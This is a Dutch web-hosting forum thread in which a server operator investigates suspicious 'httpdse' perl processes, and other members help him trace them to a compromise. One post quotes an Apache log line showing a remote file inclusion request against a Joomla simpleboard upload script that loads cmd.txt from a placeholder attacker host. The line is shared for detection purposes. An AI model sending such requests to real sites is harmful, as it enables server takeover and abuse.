Likes Likes:  0
Resultaten 1 tot 15 van de 19
Pagina 1 van de 2 1 2 LaatsteLaatste
Geen
  1. #1
    Trage server - httpdse?
    geregistreerd gebruiker
    1.892 Berichten
    Ingeschreven
    17/08/05

    Locatie
    Amsterdam

    Post Thanks / Like
    Mentioned
    34 Post(s)
    Tagged
    0 Thread(s)
    35 Berichten zijn liked


    Naam: Wieger Bontekoe
    Bedrijf: Skynet ICT B.V.
    Functie: CEO
    URL: skynet-ict.nl
    Registrar SIDN: Nee
    View wbontekoe's profile on LinkedIn

    Thread Starter

    Trage server - httpdse?

    Kan iemand me meer vertellen hierover:

    Can anybody explain what this is:

    bt3# ps aux | grep perl
    nobody 19846 13.6 0.4 5236 4544 ?? R 4:47PM 10:21.62 httpdse (perl5.8.6)
    nobody 17918 13.5 0.3 4252 3580 ?? R 4:05PM 22:03.01 httpdse (perl5.8.6)
    nobody 13669 13.4 0.4 4944 4248 ?? R 2:23PM 35:41.17 httpdse (perl5.8.6)
    nobody 17848 13.0 0.3 4256 3588 ?? R 4:04PM 22:15.69 httpdse (perl5.8.6)
    nobody 20221 13.0 0.3 4256 3592 ?? R 4:54PM 13:03.34 httpdse (perl5.8.6)
    nobody 11494 12.8 0.3 4256 3584 ?? R 1:36PM 65:12.23 httpdse (perl5.8.6)
    nobody 20147 12.5 0.3 4256 3592 ?? R 4:53PM 13:15.76 httpdse (perl5.8.6)
    nobody 9519 12.3 0.4 4548 3852 ?? R 12:58PM 82:43.68 httpdse (perl5.8.6)
    nobody 13636 12.3 0.4 4844 4148 ?? R 2:22PM 36:10.79 httpdse (perl5.8.6)
    nobody 11597 12.2 0.3 4256 3588 ?? R 1:37PM 64:35.77 httpdse (perl5.8.6)
    nobody 19869 11.6 0.4 5332 4636 ?? S 4:48PM 10:25.89 httpdse (perl5.8.6)
    nobody 9475 11.4 0.4 4448 3752 ?? S 12:57PM 79:13.87 httpdse (perl5.8.6)
    nobody 14969 5.8 0.4 5040 4344 ?? S 2:57PM 26:21.16 httpdse (perl5.8.6)
    nobody 11236 5.4 0.4 4748 4052 ?? S 1:32PM 50:32.49 httpdse (perl5.8.6)
    nobody 14991 5.3 0.4 5144 4448 ?? R 2:58PM 26:38.31 httpdse (perl5.8.6)
    nobody 11197 3.2 0.4 4644 3952 ?? S 1:31PM 49:15.61 httpdse (perl5.8.6)
    root 918 0.0 2.8 31056 29144 ?? I 11:04AM 1:26.31 spamd child (perl)

    Wat is httpdse en waarom draait het, ik heb er nog nooit van gehoord.
    Skynet ICT B.V. - The cause of the problem is: the printer thinks its a router.

  2. #2
    Trage server - httpdse?
    MacOne Internet Services
    151 Berichten
    Ingeschreven
    25/11/05

    Locatie
    Tilburg

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: 18047444
    Ondernemingsnummer: nvt

    botnetje?

  3. #3
    Trage server - httpdse?
    geregistreerd gebruiker
    1.892 Berichten
    Ingeschreven
    17/08/05

    Locatie
    Amsterdam

    Post Thanks / Like
    Mentioned
    34 Post(s)
    Tagged
    0 Thread(s)
    35 Berichten zijn liked


    Naam: Wieger Bontekoe
    Bedrijf: Skynet ICT B.V.
    Functie: CEO
    URL: skynet-ict.nl
    Registrar SIDN: Nee
    View wbontekoe's profile on LinkedIn

    Thread Starter
    Citaat Oorspronkelijk geplaatst door veraert
    botnetje?
    Ik heb geen idee, het is gewoon een normale webserver met normale klanten (dus geen kleine wizkid klantjes oid)
    Skynet ICT B.V. - The cause of the problem is: the printer thinks its a router.

  4. #4
    Trage server - httpdse?
    MacOne Internet Services
    151 Berichten
    Ingeschreven
    25/11/05

    Locatie
    Tilburg

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: 18047444
    Ondernemingsnummer: nvt

    Lekke phpbb (of ander forum zooi) of awstats.. doen ze een wgetje met een ddos progsel en voila

    Kijk eens in je /var/log/apache/error.log

  5. #5
    Trage server - httpdse?
    geregistreerd gebruiker
    1.892 Berichten
    Ingeschreven
    17/08/05

    Locatie
    Amsterdam

    Post Thanks / Like
    Mentioned
    34 Post(s)
    Tagged
    0 Thread(s)
    35 Berichten zijn liked


    Naam: Wieger Bontekoe
    Bedrijf: Skynet ICT B.V.
    Functie: CEO
    URL: skynet-ict.nl
    Registrar SIDN: Nee
    View wbontekoe's profile on LinkedIn

    Thread Starter
    ik ken het hele httpdse niet? en log zie ik niets in
    Skynet ICT B.V. - The cause of the problem is: the printer thinks its a router.

  6. #6
    Trage server - httpdse?
    nvt
    600 Berichten
    Ingeschreven
    05/09/03

    Locatie
    nvt

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: Nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    /tmp folder al gekeken?

  7. #7
    Trage server - httpdse?
    Life is short, play long!
    1.009 Berichten
    Ingeschreven
    05/05/04

    Post Thanks / Like
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    1 Berichten zijn liked


    Naam: Mike

    Controleer de volgende mapjes op bestandjes die er niet zouden moeten zijn:
    /var/tmp
    /tmp
    /dev/shm

    EDIT: Bij mij zijn bovenstaande mappen dus leeg, op /tmp na waar PHP sessies in staan. Kijk bij het ophalen van de lijsten van je mapjes dat je ook kijkt naar verborgen bestanden! (ls -a)...

    Het klinkt alsof er door een slecht script, bug in php/apache of wellicht iets anders een nep daemon is gedownload en is gestart op je server.
    Ik adviseer je voor dit soort dingetjes 'Webmin' te installeren, deze heeft een functie die heet 'Running Processes', daar kan je erg gedetaileerd zien welke processen gestart zijn, onder welke naam en vanuit welke lokatie.

    Succes!

  8. #8
    Trage server - httpdse?
    geregistreerd gebruiker
    5.163 Berichten
    Ingeschreven
    04/06/05

    Locatie
    Zeeland

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    man ps
    geen webmin nodig.

  9. #9
    Trage server - httpdse?
    Life is short, play long!
    1.009 Berichten
    Ingeschreven
    05/05/04

    Post Thanks / Like
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    1 Berichten zijn liked


    Naam: Mike

    Citaat Oorspronkelijk geplaatst door crazycoder
    man ps
    geen webmin nodig.
    Uiteraard kan je de manual van ps erbij pakken, echter soms wil je snel en overzichtelijk een oplossing.
    Als je vaker dit commando nodig hebt, is het wel handig om de werking hiervan op te zoeken natuurlijk.
    Let wel op: vermijdt het gebruik van Webmin 'server' modules op een webhosting server, ik heb hier wel zeer negatieve ervaringen mee, en dan voornamelijk met de module voor Apache.

  10. #10
    Trage server - httpdse?
    geregistreerd gebruiker
    1.103 Berichten
    Ingeschreven
    14/06/03

    Locatie
    Amsterdam

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: Ja
    KvK nummer: 22053851
    Ondernemingsnummer: NVT

    Vermijd in elk geval Webmin in een productieomgeving, vooral op een hostingmachine, Webmin brengt behoorlijk wat gevaren met zich mee (onnodig).

    Probeer eens het commando: "ps fax"

  11. #11
    Trage server - httpdse?
    geregistreerd gebruiker
    1.892 Berichten
    Ingeschreven
    17/08/05

    Locatie
    Amsterdam

    Post Thanks / Like
    Mentioned
    34 Post(s)
    Tagged
    0 Thread(s)
    35 Berichten zijn liked


    Naam: Wieger Bontekoe
    Bedrijf: Skynet ICT B.V.
    Functie: CEO
    URL: skynet-ict.nl
    Registrar SIDN: Nee
    View wbontekoe's profile on LinkedIn

    Thread Starter
    Citaat Oorspronkelijk geplaatst door XF-RICK
    Vermijd in elk geval Webmin in een productieomgeving, vooral op een hostingmachine, Webmin brengt behoorlijk wat gevaren met zich mee (onnodig).

    Probeer eens het commando: "ps fax"
    Citaat Oorspronkelijk geplaatst door XF-RICK
    Vermijd in elk geval Webmin in een productieomgeving, vooral op een hostingmachine, Webmin brengt behoorlijk wat gevaren met zich mee (onnodig).

    Probeer eens het commando: "ps fax"
    19179 ?? S 2:29.66 httpdse (perl5.8.6)
    19380 ?? S 0:01.18 ps -x (perl5.8.6)
    19381 ?? S 0:01.20 ps -x (perl5.8.6)
    19382 ?? S 0:01.18 ps -x (perl5.8.6)
    19384 ?? S 0:01.20 ps -x (perl5.8.6)
    19385 ?? S 0:01.20 ps -x (perl5.8.6)
    19389 ?? S 0:01.20 ps -x (perl5.8.6)
    19392 ?? S 0:01.19 ps -x (perl5.8.6)
    19393 ?? S 0:01.22 ps -x (perl5.8.6)
    19394 ?? S 0:01.22 ps -x (perl5.8.6)
    19395 ?? S 0:01.19 ps -x (perl5.8.6)
    19401 ?? S 0:01.18 ps -x (perl5.8.6)
    19402 ?? S 0:01.22 ps -x (perl5.8.6)
    19403 ?? S 0:01.20 ps -x (perl5.8.6)
    19404 ?? S 0:01.19 ps -x (perl5.8.6)
    19405 ?? S 0:01.23 ps -x (perl5.8.6)
    19461 ?? I 0:00.02 pure-ftpd (IDLE) (pure-ftpd)
    19522 ?? S 0:00.13 pure-ftpd (IDLE) (pure-ftpd)
    19567 ?? I 0:07.13 ps -x (perl5.8.6)
    19634 ?? S 0:00.11 ps -x (perl5.8.6)
    20020 ?? I 0:00.07 ps -x (perl5.8.6)
    20046 ?? S 0:00.07 ps -x (perl5.8.6)
    20225 ?? I 0:00.05 ps -x (perl5.8.6)
    20265 ?? I 0:00.07 ps -x (perl5.8.6)
    20420 ?? I 0:00.05 ps -x (perl5.8.6)
    20462 ?? S 0:00.07 ps -x (perl5.8.6)
    20602 ?? S 0:00.04 ps -x (perl5.8.6)
    20607 ?? I 0:00.02 ps -x (perl5.8.6)
    20616 ?? S 0:00.03 ps -x (perl5.8.6)
    dat zie ik o.a.
    Skynet ICT B.V. - The cause of the problem is: the printer thinks its a router.



  12. #12
    Trage server - httpdse?
    Web hosting diensten
    4.705 Berichten
    Ingeschreven
    09/02/04

    Locatie
    Rotterdam

    Post Thanks / Like
    Mentioned
    10 Post(s)
    Tagged
    0 Thread(s)
    110 Berichten zijn liked


    Bedrijf: DreamHost.nl Web hosting
    Functie: Managing Director
    URL: www.dreamhost.nl
    Registrar SIDN: JA
    KvK nummer: 24269577

    Zoek even naar zoiets in je Apache logs :

    Code:
    .../components/com_simpleboard/file_upload.php?sbp=http://abused.server.xxx/cmd.txt?? HTTP/1.0" 200 519 "-" "Mozilla/5.0
    abused.server.xxx kan hierin uiteraard van alles zijn.

    http://secunia.com/advisories/20409/
    DreamHost.nl Web hosting - cPanel hosting om bij weg te dromen.

  13. #13
    Trage server - httpdse?
    geregistreerd gebruiker
    1.892 Berichten
    Ingeschreven
    17/08/05

    Locatie
    Amsterdam

    Post Thanks / Like
    Mentioned
    34 Post(s)
    Tagged
    0 Thread(s)
    35 Berichten zijn liked


    Naam: Wieger Bontekoe
    Bedrijf: Skynet ICT B.V.
    Functie: CEO
    URL: skynet-ict.nl
    Registrar SIDN: Nee
    View wbontekoe's profile on LinkedIn

    Thread Starter
    IMPORTANT: Do not ignore this email.
    This is cPanel stats runner on bt3.budgettrends.nl!
    While processing the log files for user ajaxfanz, the cpu has been maxed out for more than a 6 hour period. The current load/uptime line on the server at the time of this email is
    6:52AM up 12:01, 0 users, load averages: 21.64, 19.56, 19.35
    You should check the server to see why the load is so high and take steps to lower the load. If you want stats to continue to run even with a high load; Edit /var/cpanel/cpanel.config and change extracpus to a number larger then 0 (run /usr/local/cpanel/startup afterwards to pickup the changes).
    Owke, duidelijk maar hoe kan ik de stats toch even snel maken dat hij weer "bij" is ?
    Skynet ICT B.V. - The cause of the problem is: the printer thinks its a router.

  14. #14
    Trage server - httpdse?
    Web hosting diensten
    4.705 Berichten
    Ingeschreven
    09/02/04

    Locatie
    Rotterdam

    Post Thanks / Like
    Mentioned
    10 Post(s)
    Tagged
    0 Thread(s)
    110 Berichten zijn liked


    Bedrijf: DreamHost.nl Web hosting
    Functie: Managing Director
    URL: www.dreamhost.nl
    Registrar SIDN: JA
    KvK nummer: 24269577

    Ik zou er toch maar eerst even voor zorgen dat je je lek vindt.
    De server load zal zo alleen maar toenemen, totdat de server geheel vast loopt... jammer dat je geen phpsuexec draait, want dan had je gelijk gezien welke user account misbruikt wordt... nu wordt het flink zoeken...
    DreamHost.nl Web hosting - cPanel hosting om bij weg te dromen.

  15. #15
    Trage server - httpdse?
    geregistreerd gebruiker
    1.892 Berichten
    Ingeschreven
    17/08/05

    Locatie
    Amsterdam

    Post Thanks / Like
    Mentioned
    34 Post(s)
    Tagged
    0 Thread(s)
    35 Berichten zijn liked


    Naam: Wieger Bontekoe
    Bedrijf: Skynet ICT B.V.
    Functie: CEO
    URL: skynet-ict.nl
    Registrar SIDN: Nee
    View wbontekoe's profile on LinkedIn

    Thread Starter
    Ik ben vanochtend verder gegaan en heb inderdaad in de logs iets terug gevonden;

    de Exploit zoals hierboven pakt txt bestanden en voert ze uit. Ik vond ze in de TMP en ben zo verder gaan kijken
    Skynet ICT B.V. - The cause of the problem is: the printer thinks its a router.

Pagina 1 van de 2 1 2 LaatsteLaatste

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2021 Webhostingtalk.nl.
Web Statistics